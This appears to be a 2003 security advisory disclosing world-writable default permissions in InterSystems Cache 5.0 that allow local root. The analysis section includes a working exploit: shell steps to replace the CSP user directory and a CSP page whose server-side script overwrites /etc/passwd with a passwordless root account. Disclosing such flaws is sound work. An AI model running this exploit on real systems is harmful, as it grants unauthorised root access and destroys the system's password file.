iDEFENSE Security Advisory XXXXXX:
http://www.idefense.com/advisory/XXXXXXX
Cache database poor default file permissions lead to local root. 
March 11, 2003

I. BACKGROUND

  "Cache', the post-relational database for e-applications, is optimized
for the tougher demands of Web applications. It delivers breakthrough
performance for massively scalable Web applications. Its rapid application
development environment with advanced object technology lets you operate
at Internet speed. Cache's ultra-fast SQL outperforms relational systems
20X. And its multidimensional application and data server delivers
lightning-fast performance."  (http://www.intersystems.com)


II. DESCRIPTION

   The default installation of the Cache database yeilds poorly protected
files and directories in the main package tree.  Directories and files are
open to all users as read write and execute.

III. ANALYSIS

   Local attackers can exploit this to manipulate directories and binaries
inside the installation tree.  This may be used by a local malicious user
to gain root access.   The content in /cachesys/csp/user is executed as root
through the web interface. user's parent directory (csp) is world writeable allowing a local non root user to move user aside, copy its contents and create a new writeable user directory.

1. mv /cachesys/csp/user /cachesys/csp/user.old
2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
3. cp cspexp.csp /cachesys/csp/user
4. lnyx http://localhost/csp/user/cspexp.csp
5. su - cache

<------------------cspexp.csp------------->

<html>

Intersystems Cache' local root exploit.  
Larry W. Cashdollar
http://vapid.dhs.org

Because of poor default file and directory permissions a localuser can execute
code as root via the cache CSP interpreter.
<HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

 <script language=Cache runat=server>
     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()
    </script>

</html>
<----------------snip-------------->

IV. DETECTION

Cache' Database 5.0 is affected. http://www.intersystems.com

V. WORKAROUND

  An administrator could possibly change the file permissions to something 
more restrictive that would not allow any user to manipulate data in 
the Cache installation directory. I do not know what the affect this 
would be on the Cache' database functionality.
	
VI. VENDOR FIX

The vendor has not yet notified.
 
VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project 
has not assigned an identification number to this issue.

VIII. DISCLOSURE TIMELINE

3/4/2003	Issue disclosed to iDEFENSE

IX. CREDIT

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.